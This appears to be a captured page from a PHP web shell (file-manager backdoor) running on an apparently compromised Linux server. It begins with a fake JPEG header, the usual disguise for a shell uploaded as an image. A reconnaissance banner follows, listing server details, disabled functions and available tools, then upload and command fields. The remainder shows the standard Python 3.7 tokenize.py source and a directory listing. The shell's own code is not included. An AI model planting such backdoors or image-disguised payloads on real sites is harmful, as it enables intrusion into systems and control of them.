JFIFHHC     C  " 5????! ??? JFIF    >CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality C     p!ranha?
Server IP : 172.67.137.82  /  Your IP : 104.23.243.84
Web Server : Apache/2.4.51 (Unix) OpenSSL/1.1.1n
System : Linux ip-172-26-8-243 4.19.0-27-cloud-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
User : daemon ( 1)
PHP Version : 7.4.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib/python3.7/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /usr/lib/python3.7//tokenize.py
"""Tokenization help for Python programs.

tokenize(readline) is a generator that breaks a stream of bytes into
Python tokens.  It decodes the bytes according to PEP-0263 for
determining source file encoding.

It accepts a readline-like method which is called repeatedly to get the
next line of input (or b"" for EOF).  It generates 5-tuples with these
members:

    the token type (see token.py)
    the token (a string)
    the starting (row, column) indices of the token (a 2-tuple of ints)
    the ending (row, column) indices of the token (a 2-tuple of ints)
    the original line (string)

It is designed to match the working of the Python tokenizer exactly, except
that it produces COMMENT tokens for comments and gives type OP for all
operators.  Additionally, all token lists start with an ENCODING token
which tells you which encoding was used to decode the bytes stream.
"""

__author__ = 'Ka-Ping Yee <ping@lfw.org>'
__credits__ = ('GvR, ESR, Tim Peters, Thomas Wouters, Fred Drake, '
               'Skip Montanaro, Raymond Hettinger, Trent Nelson, '
               'Michael Foord')
from builtins import open as _builtin_open
from codecs import lookup, BOM_UTF8
import collections
from io import TextIOWrapper
from itertools import chain
import itertools as _itertools
import re
import sys
from token import *

cookie_re = re.compile(r'^[ \t\f]*#.*?coding[:=][ \t]*([-\w.]+)', re.ASCII)
blank_re = re.compile(br'^[ \t\f]*(?:[#\r\n]|$)', re.ASCII)

import token
__all__ = token.__all__ + ["tokenize", "detect_encoding",
                           "untokenize", "TokenInfo"]
del token

EXACT_TOKEN_TYPES = {
    '(':   LPAR,
    ')':   RPAR,
    '[':   LSQB,
    ']':   RSQB,
    ':':   COLON,
    ',':   COMMA,
    ';':   SEMI,
    '+':   PLUS,
    '-':   MINUS,
    '*':   STAR,
    '/':   SLASH,
    '|':   VBAR,
    '&':   AMPER,
    '<':   LESS,
    '>':   GREATER,
    '=':   EQUAL,
    '.':   DOT,
    '%':   PERCENT,
    '{':   LBRACE,
    '}':   RBRACE,
    '==':  EQEQUAL,
    '!=':  NOTEQUAL,
    '<=':  LESSEQUAL,
    '>=':  GREATEREQUAL,
    '~':   TILDE,
    '^':   CIRCUMFLEX,
    '<<':  LEFTSHIFT,
    '>>':  RIGHTSHIFT,
    '**':  DOUBLESTAR,
    '+=':  PLUSEQUAL,
    '-=':  MINEQUAL,
    '*=':  STAREQUAL,
    '/=':  SLASHEQUAL,
    '%=':  PERCENTEQUAL,
    '&=':  AMPEREQUAL,
    '|=':  VBAREQUAL,
    '^=':  CIRCUMFLEXEQUAL,
    '<<=': LEFTSHIFTEQUAL,
    '>>=': RIGHTSHIFTEQUAL,
    '**=': DOUBLESTAREQUAL,
    '//':  DOUBLESLASH,
    '//=': DOUBLESLASHEQUAL,
    '...': ELLIPSIS,
    '->':  RARROW,
    '@':   AT,
    '@=':  ATEQUAL,
}

class TokenInfo(collections.namedtuple('TokenInfo', 'type string start end line')):
    def __repr__(self):
        annotated_type = '%d (%s)' % (self.type, tok_name[self.type])
        return ('TokenInfo(type=%s, string=%r, start=%r, end=%r, line=%r)' %
                self._replace(type=annotated_type))

    @property
    def exact_type(self):
        if self.type == OP and self.string in EXACT_TOKEN_TYPES:
            return EXACT_TOKEN_TYPES[self.string]
        else:
            return self.type

def group(*choices): return '(' + '|'.join(choices) + ')'
def any(*choices): return group(*choices) + '*'
def maybe(*choices): return group(*choices) + '?'

# Note: we use unicode matching for names ("\w") but ascii matching for
# number literals.
Whitespace = r'[ \f\t]*'
Comment = r'#[^\r\n]*'
Ignore = Whitespace + any(r'\\\r?\n' + Whitespace) + maybe(Comment)
Name = r'\w+'

Hexnumber = r'0[xX](?:_?[0-9a-fA-F])+'
Binnumber = r'0[bB](?:_?[01])+'
Octnumber = r'0[oO](?:_?[0-7])+'
Decnumber = r'(?:0(?:_?0)*|[1-9](?:_?[0-9])*)'
Intnumber = group(Hexnumber, Binnumber, Octnumber, Decnumber)
Exponent = r'[eE][-+]?[0-9](?:_?[0-9])*'
Pointfloat = group(r'[0-9](?:_?[0-9])*\.(?:[0-9](?:_?[0-9])*)?',
                   r'\.[0-9](?:_?[0-9])*') + maybe(Exponent)
Expfloat = r'[0-9](?:_?[0-9])*' + Exponent
Floatnumber = group(Pointfloat, Expfloat)
Imagnumber = group(r'[0-9](?:_?[0-9])*[jJ]', Floatnumber + r'[jJ]')
Number = group(Imagnumber, Floatnumber, Intnumber)

# Return the empty string, plus all of the valid string prefixes.
def _all_string_prefixes():
    # The valid string prefixes. Only contain the lower case versions,
    #  and don't contain any permuations (include 'fr', but not
    #  'rf'). The various permutations will be generated.
    _valid_string_prefixes = ['b', 'r', 'u', 'f', 'br', 'fr']
    # if we add binary f-strings, add: ['fb', 'fbr']
    result = {''}
    for prefix in _valid_string_prefixes:
        for t in _itertools.permutations(prefix):
            # create a list with upper and lower versions of each
            #  character
            for u in _itertools.product(*[(c, c.upper()) for c in t]):
                result.add(''.join(u))
    return result

def _compile(expr):
    return re.compile(expr, re.UNICODE)

# Note that since _all_string_prefixes includes the empty string,
#  StringPrefix can be the empty string (making it optional).
StringPrefix = group(*_all_string_prefixes())

# Tail end of ' string.
Single = r"[^'\\]*(?:\\.[^'\\]*)*'"
# Tail end of " string.
Double = r'[^"\\]*(?:\\.[^"\\]*)*"'
# Tail end of ''' string.
Single3 = r"[^'\\]*(?:(?:\\.|'(?!''))[^'\\]*)*'''"
# Tail end of """ string.
Double3 = r'[^"\\]*(?:(?:\\.|"(?!""))[^"\\]*)*"""'
Triple = group(StringPrefix + "'''", StringPrefix + '"""')
# Single-line ' or " string.
String = group(StringPrefix + r"'[^\n'\\]*(?:\\.[^\n'\\]*)*'",
               StringPrefix + r'"[^\n"\\]*(?:\\.[^\n"\\]*)*"')

# Because of leftmost-then-longest match semantics, be sure to put the
# longest operators first (e.g., if = came before ==, == would get
# recognized as two instances of =).
Operator = group(r"\*\*=?", r">>=?", r"<<=?", r"!=",
                 r"//=?", r"->",
                 r"[+\-*/%&@|^=<>]=?",
                 r"~")

Bracket = '[][(){}]'
Special = group(r'\r?\n', r'\.\.\.', r'[:;.,@]')
Funny = group(Operator, Bracket, Special)

PlainToken = group(Number, Funny, String, Name)
Token = Ignore + PlainToken

# First (or only) line of ' or " string.
ContStr = group(StringPrefix + r"'[^\n'\\]*(?:\\.[^\n'\\]*)*" +
                group("'", r'\\\r?\n'),
                StringPrefix + r'"[^\n"\\]*(?:\\.[^\n"\\]*)*' +
                group('"', r'\\\r?\n'))
PseudoExtras = group(r'\\\r?\n|\Z', Comment, Triple)
PseudoToken = Whitespace + group(PseudoExtras, Number, Funny, ContStr, Name)

# For a given string prefix plus quotes, endpats maps it to a regex
#  to match the remainder of that string. _prefix can be empty, for
#  a normal single or triple quoted string (with no prefix).
endpats = {}
for _prefix in _all_string_prefixes():
    endpats[_prefix + "'"] = Single
    endpats[_prefix + '"'] = Double
    endpats[_prefix + "'''"] = Single3
    endpats[_prefix + '"""'] = Double3

# A set of all of the single and triple quoted string prefixes,
#  including the opening quotes.
single_quoted = set()
triple_quoted = set()
for t in _all_string_prefixes():
    for u in (t + '"', t + "'"):
        single_quoted.add(u)
    for u in (t + '"""', t + "'''"):
        triple_quoted.add(u)

tabsize = 8

class TokenError(Exception): pass

class StopTokenizing(Exception): pass


class Untokenizer:

    def __init__(self):
        self.tokens = []
        self.prev_row = 1
        self.prev_col = 0
        self.encoding = None

    def add_whitespace(self, start):
        row, col = start
        if row < self.prev_row or row == self.prev_row and col < self.prev_col:
            raise ValueError("start ({},{}) precedes previous end ({},{})"
                             .format(row, col, self.prev_row, self.prev_col))
        row_offset = row - self.prev_row
        if row_offset:
            self.tokens.append("\\\n" * row_offset)
            self.prev_col = 0
        col_offset = col - self.prev_col
        if col_offset:
            self.tokens.append(" " * col_offset)

    def untokenize(self, iterable):
        it = iter(iterable)
        indents = []
        startline = False
        for t in it:
            if len(t) == 2:
                self.compat(t, it)
                break
            tok_type, token, start, end, line = t
            if tok_type == ENCODING:
                self.encoding = token
                continue
            if tok_type == ENDMARKER:
                break
            if tok_type == INDENT:
                indents.append(token)
                continue
            elif tok_type == DEDENT:
                indents.pop()
                self.prev_row, self.prev_col = end
                continue
            elif tok_type in (NEWLINE, NL):
                startline = True
            elif startline and indents:
                indent = indents[-1]
                if start[1] >= len(indent):
                    self.tokens.append(indent)
                    self.prev_col = len(indent)
                startline = False
            self.add_whitespace(start)
            self.tokens.append(token)
            self.prev_row, self.prev_col = end
            if tok_type in (NEWLINE, NL):
                self.prev_row += 1
                self.prev_col = 0
        return "".join(self.tokens)

    def compat(self, token, iterable):
        indents = []
        toks_append = self.tokens.append
        startline = token[0] in (NEWLINE, NL)
        prevstring = False

        for tok in chain([token], iterable):
            toknum, tokval = tok[:2]
            if toknum == ENCODING:
                self.encoding = tokval
                continue

            if toknum in (NAME, NUMBER):
                tokval += ' '

            # Insert a space between two consecutive strings
            if toknum == STRING:
                if prevstring:
                    tokval = ' ' + tokval
                prevstring = True
            else:
                prevstring = False

            if toknum == INDENT:
                indents.append(tokval)
                continue
            elif toknum == DEDENT:
                indents.pop()
                continue
            elif toknum in (NEWLINE, NL):
                startline = True
            elif startline and indents:
                toks_append(indents[-1])
                startline = False
            toks_append(tokval)


def untokenize(iterable):
    """Transform tokens back into Python source code.
    It returns a bytes object, encoded using the ENCODING
    token, which is the first token sequence output by tokenize.

    Each element returned by the iterable must be a token sequence
    with at least two elements, a token number and token value.  If
    only two tokens are passed, the resulting output is poor.

    Round-trip invariant for full input:
        Untokenized source will match input source exactly

    Round-trip invariant for limited input:
        # Output bytes will tokenize back to the input
        t1 = [tok[:2] for tok in tokenize(f.readline)]
        newcode = untokenize(t1)
        readline = BytesIO(newcode).readline
        t2 = [tok[:2] for tok in tokenize(readline)]
        assert t1 == t2
    """
    ut = Untokenizer()
    out = ut.untokenize(iterable)
    if ut.encoding is not None:
        out = out.encode(ut.encoding)
    return out


def _get_normal_name(orig_enc):
    """Imitates get_normal_name in tokenizer.c."""
    # Only care about the first 12 characters.
    enc = orig_enc[:12].lower().replace("_", "-")
    if enc == "utf-8" or enc.startswith("utf-8-"):
        return "utf-8"
    if enc in ("latin-1", "iso-8859-1", "iso-latin-1") or \
       enc.startswith(("latin-1-", "iso-8859-1-", "iso-latin-1-")):
        return "iso-8859-1"
    return orig_enc

def detect_encoding(readline):
    """
    The detect_encoding() function is used to detect the encoding that should
    be used to decode a Python source file.  It requires one argument, readline,
    in the same way as the tokenize() generator.

    It will call readline a maximum of twice, and return the encoding used
    (as a string) and a list of any lines (left as bytes) it has read in.

    It detects the encoding from the presence of a utf-8 bom or an encoding
    cookie as specified in pep-0263.  If both a bom and a cookie are present,
    but disagree, a SyntaxError will be raised.  If the encoding cookie is an
    invalid charset, raise a SyntaxError.  Note that if a utf-8 bom is found,
    'utf-8-sig' is returned.

    If no encoding is specified, then the default of 'utf-8' will be returned.
    """
    try:
        filename = readline.__self__.name
    except AttributeError:
        filename = None
    bom_found = False
    encoding = None
    default = 'utf-8'
    def read_or_stop():
        try:
            return readline()
        except StopIteration:
            return b''

    def find_cookie(line):
        try:
            # Decode as UTF-8. Either the line is an encoding declaration,
            # in which case it should be pure ASCII, or it must be UTF-8
            # per default encoding.
            line_string = line.decode('utf-8')
        except UnicodeDecodeError:
            msg = "invalid or missing encoding declaration"
            if filename is not None:
                msg = '{} for {!r}'.format(msg, filename)
            raise SyntaxError(msg)

        match = cookie_re.match(line_string)
        if not match:
            return None
        encoding = _get_normal_name(match.group(1))
        try:
            codec = lookup(encoding)
        except LookupError:
            # This behaviour mimics the Python interpreter
            if filename is None:
                msg = "unknown encoding: " + encoding
            else:
                msg = "unknown encoding for {!r}: {}".format(filename,
                        encoding)
            raise SyntaxError(msg)

        if bom_found:
            if encoding != 'utf-8':
                # This behaviour mimics the Python interpreter
                if filename is None:
                    msg = 'encoding problem: utf-8'
                else:
                    msg = 'encoding problem for {!r}: utf-8'.format(filename)
                raise SyntaxError(msg)
            encoding += '-sig'
        return encoding

    first = read_or_stop()
    if first.startswith(BOM_UTF8):
        bom_found = True
        first = first[3:]
        default = 'utf-8-sig'
    if not first:
        return default, []

    encoding = find_cookie(first)
    if encoding:
        return encoding, [first]
    if not blank_re.match(first):
        return default, [first]

    second = read_or_stop()
    if not second:
        return default, [first]

    encoding = find_cookie(second)
    if encoding:
        return encoding, [first, second]

    return default, [first, second]


def open(filename):
    """Open a file in read only mode using the encoding detected by
    detect_encoding().
    """
    buffer = _builtin_open(filename, 'rb')
    try:
        encoding, lines = detect_encoding(buffer.readline)
        buffer.seek(0)
        text = TextIOWrapper(buffer, encoding, line_buffering=True)
        text.mode = 'r'
        return text
    except:
        buffer.close()
        raise


def tokenize(readline):
    """
    The tokenize() generator requires one argument, readline, which
    must be a callable object which provides the same interface as the
    readline() method of built-in file objects.  Each call to the function
    should return one line of input as bytes.  Alternatively, readline
    can be a callable function terminating with StopIteration:
        readline = open(myfile, 'rb').__next__  # Example of alternate readline

    The generator produces 5-tuples with these members: the token type; the
    token string; a 2-tuple (srow, scol) of ints specifying the row and
    column where the token begins in the source; a 2-tuple (erow, ecol) of
    ints specifying the row and column where the token ends in the source;
    and the line on which the token was found.  The line passed is the
    logical line; continuation lines are included.

    The first token sequence will always be an ENCODING token
    which tells you which encoding was used to decode the bytes stream.
    """
    # This import is here to avoid problems when the itertools module is not
    # built yet and tokenize is imported.
    from itertools import chain, repeat
    encoding, consumed = detect_encoding(readline)
    rl_gen = iter(readline, b"")
    empty = repeat(b"")
    return _tokenize(chain(consumed, rl_gen, empty).__next__, encoding)


def _tokenize(readline, encoding):
    lnum = parenlev = continued = 0
    numchars = '0123456789'
    contstr, needcont = '', 0
    contline = None
    indents = [0]

    if encoding is not None:
        if encoding == "utf-8-sig":
            # BOM will already have been stripped.
            encoding = "utf-8"
        yield TokenInfo(ENCODING, encoding, (0, 0), (0, 0), '')
    last_line = b''
    line = b''
    while True:                                # loop over lines in stream
        try:
            # We capture the value of the line variable here because
            # readline uses the empty string '' to signal end of input,
            # hence `line` itself will always be overwritten at the end
            # of this loop.
            last_line = line
            line = readline()
        except StopIteration:
            line = b''

        if encoding is not None:
            line = line.decode(encoding)
        lnum += 1
        pos, max = 0, len(line)

        if contstr:                            # continued string
            if not line:
                raise TokenError("EOF in multi-line string", strstart)
            endmatch = endprog.match(line)
            if endmatch:
                pos = end = endmatch.end(0)
                yield TokenInfo(STRING, contstr + line[:end],
                       strstart, (lnum, end), contline + line)
                contstr, needcont = '', 0
                contline = None
            elif needcont and line[-2:] != '\\\n' and line[-3:] != '\\\r\n':
                yield TokenInfo(ERRORTOKEN, contstr + line,
                           strstart, (lnum, len(line)), contline)
                contstr = ''
                contline = None
                continue
            else:
                contstr = contstr + line
                contline = contline + line
                continue

        elif parenlev == 0 and not continued:  # new statement
            if not line: break
            column = 0
            while pos < max:                   # measure leading whitespace
                if line[pos] == ' ':
                    column += 1
                elif line[pos] == '\t':
                    column = (column//tabsize + 1)*tabsize
                elif line[pos] == '\f':
                    column = 0
                else:
                    break
                pos += 1
            if pos == max:
                break

            if line[pos] in '#\r\n':           # skip comments or blank lines
                if line[pos] == '#':
                    comment_token = line[pos:].rstrip('\r\n')
                    yield TokenInfo(COMMENT, comment_token,
                           (lnum, pos), (lnum, pos + len(comment_token)), line)
                    pos += len(comment_token)

                yield TokenInfo(NL, line[pos:],
                           (lnum, pos), (lnum, len(line)), line)
                continue

            if column > indents[-1]:           # count indents or dedents
                indents.append(column)
                yield TokenInfo(INDENT, line[:pos], (lnum, 0), (lnum, pos), line)
            while column < indents[-1]:
                if column not in indents:
                    raise IndentationError(
                        "unindent does not match any outer indentation level",
                        ("<tokenize>", lnum, pos, line))
                indents = indents[:-1]

                yield TokenInfo(DEDENT, '', (lnum, pos), (lnum, pos), line)

        else:                                  # continued statement
            if not line:
                raise TokenError("EOF in multi-line statement", (lnum, 0))
            continued = 0

        while pos < max:
            pseudomatch = _compile(PseudoToken).match(line, pos)
            if pseudomatch:                                # scan for tokens
                start, end = pseudomatch.span(1)
                spos, epos, pos = (lnum, start), (lnum, end), end
                if start == end:
                    continue
                token, initial = line[start:end], line[start]

                if (initial in numchars or                  # ordinary number
                    (initial == '.' and token != '.' and token != '...')):
                    yield TokenInfo(NUMBER, token, spos, epos, line)
                elif initial in '\r\n':
                    if parenlev > 0:
                        yield TokenInfo(NL, token, spos, epos, line)
                    else:
                        yield TokenInfo(NEWLINE, token, spos, epos, line)

                elif initial == '#':
                    assert not token.endswith("\n")
                    yield TokenInfo(COMMENT, token, spos, epos, line)

                elif token in triple_quoted:
                    endprog = _compile(endpats[token])
                    endmatch = endprog.match(line, pos)
                    if endmatch:                           # all on one line
                        pos = endmatch.end(0)
                        token = line[start:pos]
                        yield TokenInfo(STRING, token, spos, (lnum, pos), line)
                    else:
                        strstart = (lnum, start)           # multiple lines
                        contstr = line[start:]
                        contline = line
                        break

                # Check up to the first 3 chars of the token to see if
                #  they're in the single_quoted set. If so, they start
                #  a string.
                # We're using the first 3, because we're looking for
                #  "rb'" (for example) at the start of the token. If
                #  we switch to longer prefixes, this needs to be
                #  adjusted.
                # Note that initial == token[:1].
                # Also note that single quote checking must come after
                #  triple quote checking (above).
                elif (initial in single_quoted or
                      token[:2] in single_quoted or
                      token[:3] in single_quoted):
                    if token[-1] == '\n':                  # continued string
                        strstart = (lnum, start)
                        # Again, using the first 3 chars of the
                        #  token. This is looking for the matching end
                        #  regex for the correct type of quote
                        #  character. So it's really looking for
                        #  endpats["'"] or endpats['"'], by trying to
                        #  skip string prefix characters, if any.
                        endprog = _compile(endpats.get(initial) or
                                           endpats.get(token[1]) or
                                           endpats.get(token[2]))
                        contstr, needcont = line[start:], 1
                        contline = line
                        break
                    else:                                  # ordinary string
                        yield TokenInfo(STRING, token, spos, epos, line)

                elif initial.isidentifier():               # ordinary name
                    yield TokenInfo(NAME, token, spos, epos, line)
                elif initial == '\\':                      # continued stmt
                    continued = 1
                else:
                    if initial in '([{':
                        parenlev += 1
                    elif initial in ')]}':
                        parenlev -= 1
                    yield TokenInfo(OP, token, spos, epos, line)
            else:
                yield TokenInfo(ERRORTOKEN, line[pos],
                           (lnum, pos), (lnum, pos+1), line)
                pos += 1

    # Add an implicit NEWLINE if the input doesn't end in one
    if last_line and last_line[-1] not in '\r\n':
        yield TokenInfo(NEWLINE, '', (lnum - 1, len(last_line)), (lnum - 1, len(last_line) + 1), '')
    for indent in indents[1:]:                 # pop remaining indent levels
        yield TokenInfo(DEDENT, '', (lnum, 0), (lnum, 0), '')
    yield TokenInfo(ENDMARKER, '', (lnum, 0), (lnum, 0), '')


# An undocumented, backwards compatible, API for all the places in the standard
# library that expect to be able to use tokenize with strings
def generate_tokens(readline):
    return _tokenize(readline, None)

def main():
    import argparse

    # Helper error handling routines
    def perror(message):
        print(message, file=sys.stderr)

    def error(message, filename=None, location=None):
        if location:
            args = (filename,) + location + (message,)
            perror("%s:%d:%d: error: %s" % args)
        elif filename:
            perror("%s: error: %s" % (filename, message))
        else:
            perror("error: %s" % message)
        sys.exit(1)

    # Parse the arguments and options
    parser = argparse.ArgumentParser(prog='python -m tokenize')
    parser.add_argument(dest='filename', nargs='?',
                        metavar='filename.py',
                        help='the file to tokenize; defaults to stdin')
    parser.add_argument('-e', '--exact', dest='exact', action='store_true',
                        help='display token names using the exact type')
    args = parser.parse_args()

    try:
        # Tokenize the input
        if args.filename:
            filename = args.filename
            with _builtin_open(filename, 'rb') as f:
                tokens = list(tokenize(f.readline))
        else:
            filename = "<stdin>"
            tokens = _tokenize(sys.stdin.readline, None)

        # Output the tokenization
        for token in tokens:
            token_type = token.type
            if args.exact:
                token_type = token.exact_type
            token_range = "%d,%d-%d,%d:" % (token.start + token.end)
            print("%-20s%-15s%-15r" %
                  (token_range, tok_name[token_type], token.string))
    except IndentationError as err:
        line, column = err.args[1][1:3]
        error(err.args[0], filename, (line, column))
    except TokenError as err:
        line, column = err.args[1]
        error(err.args[0], filename, (line, column))
    except SyntaxError as err:
        error(err, filename)
    except OSError as err:
        error(err)
    except KeyboardInterrupt:
        print("interrupted\n")
    except Exception as err:
        perror("unexpected error: %s" % err)
        raise

if __name__ == "__main__":
    main()
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
December 26 2023 06:45:21
root / root
0755
__pycache__
--
March 25 2024 06:27:06
root / root
0755
asyncio
--
March 25 2024 06:27:06
root / root
0755
collections
--
March 25 2024 06:27:05
root / root
0755
concurrent
--
March 25 2024 06:27:06
root / root
0755
ctypes
--
March 25 2024 06:27:06
root / root
0755
curses
--
March 25 2024 06:27:06
root / root
0755
dbm
--
March 25 2024 06:27:06
root / root
0755
distutils
--
March 25 2024 06:27:05
root / root
0755
email
--
March 25 2024 06:27:06
root / root
0755
encodings
--
March 25 2024 06:27:05
root / root
0755
html
--
March 25 2024 06:27:06
root / root
0755
http
--
March 25 2024 06:27:06
root / root
0755
importlib
--
March 25 2024 06:27:05
root / root
0755
json
--
March 25 2024 06:27:06
root / root
0755
lib-dynload
--
March 25 2024 06:27:05
root / root
0755
lib2to3
--
November 05 2021 16:20:33
root / root
0755
logging
--
March 25 2024 06:27:05
root / root
0755
multiprocessing
--
March 25 2024 06:27:06
root / root
0755
pydoc_data
--
March 25 2024 06:27:06
root / root
0755
sqlite3
--
March 25 2024 06:27:06
root / root
0755
test
--
March 25 2024 06:27:06
root / root
0755
unittest
--
March 25 2024 06:27:06
root / root
0755
urllib
--
March 25 2024 06:27:06
root / root
0755
venv
--
March 25 2024 06:27:06
root / root
0755
wsgiref
--
March 25 2024 06:27:06
root / root
0755
xml
--
March 25 2024 06:27:06
root / root
0755
xmlrpc
--
March 25 2024 06:27:06
root / root
0755
LICENSE.txt
12.47 KB
March 23 2024 16:12:05
root / root
0644
__future__.py
4.981 KB
March 23 2024 16:12:05
root / root
0644
__phello__.foo.py
0.063 KB
March 23 2024 16:12:05
root / root
0644
_bootlocale.py
1.759 KB
March 23 2024 16:12:05
root / root
0644
_collections_abc.py
25.805 KB
March 23 2024 16:12:05
root / root
0644
_compat_pickle.py
8.544 KB
March 23 2024 16:12:05
root / root
0644
_compression.py
5.215 KB
March 23 2024 16:12:05
root / root
0644
_dummy_thread.py
4.997 KB
March 23 2024 16:12:05
root / root
0644
_markupbase.py
14.256 KB
March 23 2024 16:12:05
root / root
0644
_osx_support.py
18.671 KB
March 23 2024 16:12:05
root / root
0644
_py_abc.py
6.041 KB
March 23 2024 16:12:05
root / root
0644
_pydecimal.py
223.179 KB
March 23 2024 16:12:05
root / root
0644
_pyio.py
89.029 KB
March 23 2024 16:12:05
root / root
0644
_sitebuiltins.py
3.042 KB
March 23 2024 16:12:05
root / root
0644
_strptime.py
24.906 KB
March 23 2024 16:12:05
root / root
0644
_sysconfigdata_m_linux_x86_64-linux-gnu.py
23.952 KB
March 23 2024 16:12:05
root / root
0644
_threading_local.py
7.045 KB
March 23 2024 16:12:05
root / root
0644
_weakrefset.py
5.546 KB
March 23 2024 16:12:05
root / root
0644
abc.py
5.449 KB
March 23 2024 16:12:05
root / root
0644
aifc.py
32.045 KB
March 23 2024 16:12:05
root / root
0644
antigravity.py
0.466 KB
March 23 2024 16:12:05
root / root
0644
argparse.py
93.065 KB
March 23 2024 16:12:05
root / root
0644
ast.py
12.28 KB
March 23 2024 16:12:05
root / root
0644
asynchat.py
11.063 KB
March 23 2024 16:12:05
root / root
0644
asyncore.py
19.646 KB
March 23 2024 16:12:05
root / root
0644
base64.py
19.9 KB
March 23 2024 16:12:05
root / root
0755
bdb.py
30.751 KB
March 23 2024 16:12:05
root / root
0644
binhex.py
13.627 KB
March 23 2024 16:12:05
root / root
0644
bisect.py
2.497 KB
March 23 2024 16:12:05
root / root
0644
bz2.py
12.119 KB
March 23 2024 16:12:05
root / root
0644
cProfile.py
5.667 KB
March 23 2024 16:12:05
root / root
0755
calendar.py
24.244 KB
March 23 2024 16:12:05
root / root
0644
cgi.py
33.736 KB
March 23 2024 16:12:05
root / root
0755
cgitb.py
11.736 KB
March 23 2024 16:12:05
root / root
0644
chunk.py
5.308 KB
March 23 2024 16:12:05
root / root
0644
cmd.py
14.512 KB
March 23 2024 16:12:05
root / root
0644
code.py
10.37 KB
March 23 2024 16:12:05
root / root
0644
codecs.py
35.437 KB
March 23 2024 16:12:05
root / root
0644
codeop.py
5.854 KB
March 23 2024 16:12:05
root / root
0644
colorsys.py
3.969 KB
March 23 2024 16:12:05
root / root
0644
compileall.py
13.329 KB
March 23 2024 16:12:05
root / root
0644
configparser.py
53.011 KB
March 23 2024 16:12:05
root / root
0644
contextlib.py
23.217 KB
March 23 2024 16:12:05
root / root
0644
contextvars.py
0.126 KB
March 23 2024 16:12:05
root / root
0644
copy.py
8.608 KB
March 23 2024 16:12:05
root / root
0644
copyreg.py
6.853 KB
March 23 2024 16:12:05
root / root
0644
crypt.py
3.268 KB
March 23 2024 16:12:05
root / root
0644
csv.py
15.801 KB
March 23 2024 16:12:05
root / root
0644
dataclasses.py
47.371 KB
March 23 2024 16:12:05
root / root
0644
datetime.py
84.275 KB
March 23 2024 16:12:05
root / root
0644
decimal.py
0.313 KB
March 23 2024 16:12:05
root / root
0644
difflib.py
82.409 KB
March 23 2024 16:12:05
root / root
0644
dis.py
19.422 KB
March 23 2024 16:12:05
root / root
0644
doctest.py
101.84 KB
March 23 2024 16:12:05
root / root
0644
dummy_threading.py
2.749 KB
March 23 2024 16:12:05
root / root
0644
enum.py
33.963 KB
March 23 2024 16:12:05
root / root
0644
filecmp.py
9.6 KB
March 23 2024 16:12:05
root / root
0644
fileinput.py
14.227 KB
March 23 2024 16:12:05
root / root
0644
fnmatch.py
3.961 KB
March 23 2024 16:12:05
root / root
0644
formatter.py
14.788 KB
March 23 2024 16:12:05
root / root
0644
fractions.py
23.085 KB
March 23 2024 16:12:05
root / root
0644
ftplib.py
34.783 KB
March 23 2024 16:12:05
root / root
0644
functools.py
31.681 KB
March 23 2024 16:12:05
root / root
0644
genericpath.py
4.645 KB
March 23 2024 16:12:05
root / root
0644
getopt.py
7.313 KB
March 23 2024 16:12:05
root / root
0644
getpass.py
5.854 KB
March 23 2024 16:12:05
root / root
0644
gettext.py
21.869 KB
March 23 2024 16:12:05
root / root
0644
glob.py
5.506 KB
March 23 2024 16:12:05
root / root
0644
gzip.py
19.861 KB
March 23 2024 16:12:05
root / root
0644
hashlib.py
9.311 KB
March 23 2024 16:12:05
root / root
0644
heapq.py
22.478 KB
March 23 2024 16:12:05
root / root
0644
hmac.py
6.364 KB
March 23 2024 16:12:05
root / root
0644
imaplib.py
52.043 KB
March 23 2024 16:12:05
root / root
0644
imghdr.py
3.706 KB
March 23 2024 16:12:05
root / root
0644
imp.py
10.289 KB
March 23 2024 16:12:05
root / root
0644
inspect.py
114.858 KB
March 23 2024 16:12:05
root / root
0644
io.py
3.435 KB
March 23 2024 16:12:05
root / root
0644
ipaddress.py
73.324 KB
March 23 2024 16:12:05
root / root
0644
keyword.py
2.19 KB
March 23 2024 16:12:05
root / root
0755
linecache.py
5.188 KB
March 23 2024 16:12:05
root / root
0644
locale.py
76.202 KB
March 23 2024 16:12:05
root / root
0644
lzma.py
12.679 KB
March 23 2024 16:12:05
root / root
0644
macpath.py
5.979 KB
March 23 2024 16:12:05
root / root
0644
mailbox.py
76.811 KB
March 23 2024 16:12:05
root / root
0644
mailcap.py
8.854 KB
March 23 2024 16:12:05
root / root
0644
mimetypes.py
20.391 KB
March 23 2024 16:12:05
root / root
0644
modulefinder.py
22.495 KB
March 23 2024 16:12:05
root / root
0644
netrc.py
5.436 KB
March 23 2024 16:12:05
root / root
0644
nntplib.py
42.078 KB
March 23 2024 16:12:05
root / root
0644
ntpath.py
21.816 KB
March 23 2024 16:12:05
root / root
0644
nturl2path.py
2.523 KB
March 23 2024 16:12:05
root / root
0644
numbers.py
10.004 KB
March 23 2024 16:12:05
root / root
0644
opcode.py
5.688 KB
March 23 2024 16:12:05
root / root
0644
operator.py
10.608 KB
March 23 2024 16:12:05
root / root
0644
optparse.py
58.956 KB
March 23 2024 16:12:05
root / root
0644
os.py
36.871 KB
March 23 2024 16:12:05
root / root
0644
pathlib.py
48.231 KB
March 23 2024 16:12:05
root / root
0644
pdb.py
61.076 KB
March 23 2024 16:12:05
root / root
0755
pickle.py
56.481 KB
March 23 2024 16:12:05
root / root
0644
pickletools.py
89.082 KB
March 23 2024 16:12:05
root / root
0644
pipes.py
8.707 KB
March 23 2024 16:12:05
root / root
0644
pkgutil.py
20.958 KB
March 23 2024 16:12:05
root / root
0644
platform.py
46.906 KB
March 23 2024 16:12:05
root / root
0755
plistlib.py
29.973 KB
March 23 2024 16:12:05
root / root
0644
poplib.py
14.613 KB
March 23 2024 16:12:05
root / root
0644
posixpath.py
15.402 KB
March 23 2024 16:12:05
root / root
0644
pprint.py
20.395 KB
March 23 2024 16:12:05
root / root
0644
profile.py
21.527 KB
March 23 2024 16:12:05
root / root
0755
pstats.py
26.673 KB
March 23 2024 16:12:05
root / root
0644
pty.py
4.651 KB
March 23 2024 16:12:05
root / root
0644
py_compile.py
7.813 KB
March 23 2024 16:12:05
root / root
0644
